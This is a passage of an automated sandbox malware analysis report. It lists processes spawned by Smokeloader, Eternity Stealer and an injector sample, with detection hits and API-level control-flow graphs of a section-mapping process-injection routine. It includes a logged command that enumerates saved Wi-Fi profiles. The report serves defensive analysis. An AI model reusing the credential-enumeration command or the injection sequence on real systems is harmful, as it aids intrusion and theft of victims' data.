                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000023.00000002.2438798088.0000000001FC1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                    • Detection: 41%, ReversingLabs
                                                                                                                                                                    • Detection: 46%, Virustotal, Browse
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:36
                                                                                                                                                                    Start time:05:30:10
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5968 -ip 5968
                                                                                                                                                                    Imagebase:0x840000
                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:37
                                                                                                                                                                    Start time:05:30:10
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 500
                                                                                                                                                                    Imagebase:0x840000
                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:38
                                                                                                                                                                    Start time:05:30:15
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\ProgramData\Drivers\csrss.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\ProgramData\Drivers\csrss.exe"
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:1'899'520 bytes
                                                                                                                                                                    MD5 hash:AA053CF4ED948FEC79703DEBBB45FBBF
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:40
                                                                                                                                                                    Start time:05:30:25
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\1600.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\1600.exe
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:4'707'351 bytes
                                                                                                                                                                    MD5 hash:AC1F652F56A5D8DA834680A729BB08C7
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                    • Detection: 11%, ReversingLabs
                                                                                                                                                                    • Detection: 12%, Virustotal, Browse
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:41
                                                                                                                                                                    Start time:05:30:26
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\is-K8FH3.tmp\1600.tmp
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\is-K8FH3.tmp\1600.tmp" /SL5="$D029C,4455529,54272,C:\Users\user\AppData\Local\Temp\1600.exe"
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:704'512 bytes
                                                                                                                                                                    MD5 hash:A7662827ECAEB4FC68334F6B8791B917
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 4%, ReversingLabs
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:42
                                                                                                                                                                    Start time:05:30:26
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:XXX
                                                                                                                                                                    Imagebase:0xfb0000
                                                                                                                                                                    File size:42'064 bytes
                                                                                                                                                                    MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_EternityStealer, Description: Yara detected Eternity Stealer, Source: 0000002A.00000002.2767631716.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_EternityStealer, Description: Yara detected Eternity Stealer, Source: 0000002A.00000002.2865725310.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 0000002A.00000002.2865725310.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:45
                                                                                                                                                                    Start time:05:30:28
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\1600.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\1600.exe" /SPAWNWND=$B02AC /NOTIFYWND=$D029C
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:4'707'351 bytes
                                                                                                                                                                    MD5 hash:AC1F652F56A5D8DA834680A729BB08C7
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Target ID:46
                                                                                                                                                                    Start time:05:30:28
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                                                                                                                                                                    Imagebase:0x240000
                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:47
                                                                                                                                                                    Start time:05:30:29
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:48
                                                                                                                                                                    Start time:05:30:30
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\chcp.com
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:chcp 65001
                                                                                                                                                                    Imagebase:0x1e0000
                                                                                                                                                                    File size:12'800 bytes
                                                                                                                                                                    MD5 hash:20A59FB950D8A191F7D35C4CA7DA9CAF
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Target ID:49
                                                                                                                                                                    Start time:05:30:30
                                                                                                                                                                    Start date:07/01/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\FD8E.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\FD8E.exe
                                                                                                                                                                    Imagebase:0x3e0000
                                                                                                                                                                    File size:6'775'808 bytes
                                                                                                                                                                    MD5 hash:9DC46160B805B73634F4BD8507F11494
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\FD8E.exe, Author: ditekSHen
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                    • Detection: 96%, ReversingLabs
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Reset < >

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:3.7%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:27.3%
                                                                                                                                                                      Signature Coverage:35.4%
                                                                                                                                                                      Total number of Nodes:99
                                                                                                                                                                      Total number of Limit Nodes:5
                                                                                                                                                                      execution_graph 10531 402eba 10533 402ecc 10531->10533 10532 402f54 10533->10532 10535 40193e 10533->10535 10536 40194f 10535->10536 10537 401991 Sleep 10536->10537 10538 4019ac 10537->10538 10540 4019bd 10538->10540 10541 401553 10538->10541 10540->10532 10542 401563 10541->10542 10543 4018dd 10542->10543 10544 401608 NtDuplicateObject 10542->10544 10543->10540 10544->10543 10545 401625 NtCreateSection 10544->10545 10546 4016a5 NtCreateSection 10545->10546 10547 40164b NtMapViewOfSection 10545->10547 10546->10543 10549 4016d1 10546->10549 10547->10546 10548 40166e NtMapViewOfSection 10547->10548 10548->10546 10550 40168c 10548->10550 10549->10543 10551 4016db NtMapViewOfSection 10549->10551 10550->10546 10551->10543 10552 401702 NtMapViewOfSection 10551->10552 10552->10543 10553 401724 10552->10553 10553->10543 10555 401729 10553->10555 10556 40172b 10555->10556 10561 401724 10555->10561 10557 4016be NtCreateSection 10556->10557 10556->10561 10558 4016d1 10557->10558 10557->10561 10559 4016db NtMapViewOfSection 10558->10559 10558->10561 10560 401702 NtMapViewOfSection 10559->10560 10559->10561 10560->10561 10561->10543 10562 80f9ed 10565 80f9fd 10562->10565 10566 80fa0c 10565->10566 10569 81019d 10566->10569 10570 8101b8 10569->10570 10571 8101c1 CreateToolhelp32Snapshot 10570->10571 10572 8101dd Module32First 10570->10572 10571->10570 10571->10572 10573 80f9fc 10572->10573 10574 8101ec 10572->10574 10576 80fe5c 10574->10576 10577 80fe87 10576->10577 10578 80fe98 VirtualAlloc 10577->10578 10579 80fed0 10577->10579 10578->10579 10580 72003c 10581 720049 10580->10581 10593 720e0f SetErrorMode SetErrorMode 10581->10593 10586 720265 10587 7202ce VirtualProtect 10586->10587 10589 72030b 10587->10589 10588 720439 VirtualFree 10592 7204be LoadLibraryA 10588->10592 10589->10588 10591 7208c7 10592->10591 10594 720223 10593->10594 10595 720d90 10594->10595 10596 720dad 10595->10596 10597 720238 VirtualAlloc 10596->10597 10598 720dbb GetPEB 10596->10598 10597->10586 10598->10597 10599 426f5c 10600 426f6c 10599->10600 10601 426f78 SetConsoleOutputCP 10600->10601 10602 426f95 SetFileAttributesW OpenWaitableTimerA 10600->10602 10603 426fb1 10600->10603 10601->10600 10602->10600 10604 426fd6 WriteConsoleOutputA 10603->10604 10605 427019 10603->10605 10604->10603 10608 426c1f 10605->10608 10609 426c2c 10608->10609 10610 426c60 GetLastError 10609->10610 10611 426c58 SetConsoleCP 10609->10611 10613 426c8e 10609->10613 10610->10609 10612 426c6f 10610->10612 10611->10610 10612->10613 10616 426c78 GetCompressedFileSizeA TlsSetValue 10612->10616 10614 426cc6 CopyFileExW AddAtomA FreeEnvironmentStringsA GetModuleHandleW EnumDateFormatsExA 10613->10614 10615 426d29 10613->10615 10617 426d0b RtlTryEnterCriticalSection 10614->10617 10618 426d18 10614->10618 10620 426d53 FreeLibrary LocalFree 10615->10620 10621 426d6d 8 API calls 10615->10621 10630 426de9 10615->10630 10616->10613 10617->10618 10618->10615 10620->10621 10621->10630 10622 426eb0 10633 426a16 LoadLibraryA 10622->10633 10623 426ea4 VirtualLock 10624 426e43 10623->10624 10624->10622 10624->10623 10626 426eb5 10634 42628b 10626->10634 10632 426276 GlobalAlloc 10630->10632 10632->10624 10633->10626 10635 426299 10634->10635 10636 4262a5 VirtualProtect 10635->10636 10637 426a10 10635->10637 10636->10635 10638 426b79 10637->10638 10645 426aa6 10638->10645 10641 426c0a 10650 426af0 10641->10650 10642 426bae 7 API calls 10642->10641 10646 426ab7 CreateJobObjectW 10645->10646 10647 426ac4 10645->10647 10646->10647 10648 426ad8 HeapFree QueryPerformanceFrequency 10647->10648 10649 426aee 10647->10649 10648->10649 10649->10641 10649->10642 10652 426b55 10650->10652 10653 426b16 10650->10653 10651 426b1b FreeEnvironmentStringsA 10651->10653 10653->10651 10653->10652 10654 426b37 LCMapStringW GetModuleHandleW 10653->10654 10654->10653

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 90 401553-4015b2 call 4011cd 102 4015b4 90->102 103 4015b7-4015bc 90->103 102->103 105 4015c2-4015d3 103->105 106 4018df-4018e7 103->106 110 4015d9-401602 105->110 111 4018dd 105->111 106->103 109 4018ec-40193b call 4011cd 106->109 110->111 118 401608-40161f NtDuplicateObject 110->118 111->109 118->111 120 401625-401649 NtCreateSection 118->120 122 4016a5-4016cb NtCreateSection 120->122 123 40164b-40166c NtMapViewOfSection 120->123 122->111 127 4016d1-4016d5 122->127 123->122 125 40166e-40168a NtMapViewOfSection 123->125 125->122 128 40168c-4016a2 125->128 127->111 130 4016db-4016fc NtMapViewOfSection 127->130 128->122 130->111 132 401702-40171e NtMapViewOfSection 130->132 132->111 135 401724 132->135 135->111 136 401724 call 401729 135->136 136->111
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707386702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                                      • Opcode ID: 1cdcbea8673e3ba493c5bd81f578c50c028e74630b806944f59cf8ede5196817
                                                                                                                                                                      • Instruction ID: ffaca3094f7e189a6d1e876f152d3a102a579446f97b5118db7f8e4db1241ca1
                                                                                                                                                                      • Opcode Fuzzy Hash: 1cdcbea8673e3ba493c5bd81f578c50c028e74630b806944f59cf8ede5196817
                                                                                                                                                                      • Instruction Fuzzy Hash: FB613075A00204FBEB209F91CC49FAF7BB8EF85700F10412AF912BA1E5D7759941DB66
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 137 40156b-4015b2 call 4011cd 149 4015b4 137->149 150 4015b7-4015bc 137->150 149->150 152 4015c2-4015d3 150->152 153 4018df-4018e7 150->153 157 4015d9-401602 152->157 158 4018dd 152->158 153->150 156 4018ec-40193b call 4011cd 153->156 157->158 165 401608-40161f NtDuplicateObject 157->165 158->156 165->158 167 401625-401649 NtCreateSection 165->167 169 4016a5-4016cb NtCreateSection 167->169 170 40164b-40166c NtMapViewOfSection 167->170 169->158 174 4016d1-4016d5 169->174 170->169 172 40166e-40168a NtMapViewOfSection 170->172 172->169 175 40168c-4016a2 172->175 174->158 177 4016db-4016fc NtMapViewOfSection 174->177 175->169 177->158 179 401702-40171e NtMapViewOfSection 177->179 179->158 182 401724 179->182 182->158 183 401724 call 401729 182->183 183->158
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707386702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                                      • Opcode ID: c2bbe74deda3eb27cc46c97da06047b5daec93b008bb2466c6e516ff61897217
                                                                                                                                                                      • Instruction ID: bfc0b8c1e1aad88884ae744cc722ee3a04b4b25e2f03b0569bf5ee1b63965b96
                                                                                                                                                                      • Opcode Fuzzy Hash: c2bbe74deda3eb27cc46c97da06047b5daec93b008bb2466c6e516ff61897217
                                                                                                                                                                      • Instruction Fuzzy Hash: 34512B75900205BBEB209F91CC49FAF7BB8FF85B00F14412AF912BA2E5D7759941CB25
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 184 401561-4015b2 call 4011cd 194 4015b4 184->194 195 4015b7-4015bc 184->195 194->195 197 4015c2-4015d3 195->197 198 4018df-4018e7 195->198 202 4015d9-401602 197->202 203 4018dd 197->203 198->195 201 4018ec-40193b call 4011cd 198->201 202->203 210 401608-40161f NtDuplicateObject 202->210 203->201 210->203 212 401625-401649 NtCreateSection 210->212 214 4016a5-4016cb NtCreateSection 212->214 215 40164b-40166c NtMapViewOfSection 212->215 214->203 219 4016d1-4016d5 214->219 215->214 217 40166e-40168a NtMapViewOfSection 215->217 217->214 220 40168c-4016a2 217->220 219->203 222 4016db-4016fc NtMapViewOfSection 219->222 220->214 222->203 224 401702-40171e NtMapViewOfSection 222->224 224->203 227 401724 224->227 227->203 228 401724 call 401729 227->228 228->203
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707386702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                                      • Opcode ID: f5d4f3e6d24d18269c7d341504c2ba3eacb72c3278c0acdc5b4cfb2713eaeaae
                                                                                                                                                                      • Instruction ID: 412e9309e7daddaa9b19f32dddfbffbd79934f2f1d3bc440b9a7152e2b53a84f
                                                                                                                                                                      • Opcode Fuzzy Hash: f5d4f3e6d24d18269c7d341504c2ba3eacb72c3278c0acdc5b4cfb2713eaeaae
                                                                                                                                                                      • Instruction Fuzzy Hash: 235119B1900205BFEB209F91CC49FAF7BB8EF85B00F14412AF912BA2E5D7759941CB25
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 229 40156f-4015b2 call 4011cd 237 4015b4 229->237 238 4015b7-4015bc 229->238 237->238 240 4015c2-4015d3 238->240 241 4018df-4018e7 238->241 245 4015d9-401602 240->245 246 4018dd 240->246 241->238 244 4018ec-40193b call 4011cd 241->244 245->246 253 401608-40161f NtDuplicateObject 245->253 246->244 253->246 255 401625-401649 NtCreateSection 253->255 257 4016a5-4016cb NtCreateSection 255->257 258 40164b-40166c NtMapViewOfSection 255->258 257->246 262 4016d1-4016d5 257->262 258->257 260 40166e-40168a NtMapViewOfSection 258->260 260->257 263 40168c-4016a2 260->263 262->246 265 4016db-4016fc NtMapViewOfSection 262->265 263->257 265->246 267 401702-40171e NtMapViewOfSection 265->267 267->246 270 401724 267->270 270->246 271 401724 call 401729 270->271 271->246
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707386702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                                      • Opcode ID: 8d7d0f05522378b87eb0e5b73b0488eef97448bc713828db65d76f104e18ff93
                                                                                                                                                                      • Instruction ID: 5723072b253cbae10e330d7def6e8ce5ab34414c0c11206194204dab9df800f9
                                                                                                                                                                      • Opcode Fuzzy Hash: 8d7d0f05522378b87eb0e5b73b0488eef97448bc713828db65d76f104e18ff93
                                                                                                                                                                      • Instruction Fuzzy Hash: 6A5109B1900205BBEB209F91CC49FAF7BB8EF85B00F144129FA11BA2E5D6759945CB24
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 272 401583-4015b2 call 4011cd 281 4015b4 272->281 282 4015b7-4015bc 272->282 281->282 284 4015c2-4015d3 282->284 285 4018df-4018e7 282->285 289 4015d9-401602 284->289 290 4018dd 284->290 285->282 288 4018ec-40193b call 4011cd 285->288 289->290 297 401608-40161f NtDuplicateObject 289->297 290->288 297->290 299 401625-401649 NtCreateSection 297->299 301 4016a5-4016cb NtCreateSection 299->301 302 40164b-40166c NtMapViewOfSection 299->302 301->290 306 4016d1-4016d5 301->306 302->301 304 40166e-40168a NtMapViewOfSection 302->304 304->301 307 40168c-4016a2 304->307 306->290 309 4016db-4016fc NtMapViewOfSection 306->309 307->301 309->290 311 401702-40171e NtMapViewOfSection 309->311 311->290 314 401724 311->314 314->290 315 401724 call 401729 314->315 315->290
                                                                                                                                                                      APIs
                                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1707386702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_987123.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                                      • Opcode ID: bd72895939b5cf7358d34c5469aba93b22efce73c39120c4875d5ae9870c0d64
                                                                                                                                                                      • Instruction ID: be4f3395432beacb56dc40f225edc855b7308e08cbc6b66c5e1fe0de6445bc19
                                                                                                                                                                      • Opcode Fuzzy Hash: bd72895939b5cf7358d34c5469aba93b22efce73c39120c4875d5ae9870c0d64
                                                                                                                                                                      • Instruction Fuzzy Hash: D6510BB1900205BBEB209F91CC49FAF7BB8EF85B00F14412AFA11BA2E5D7759945CB64
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
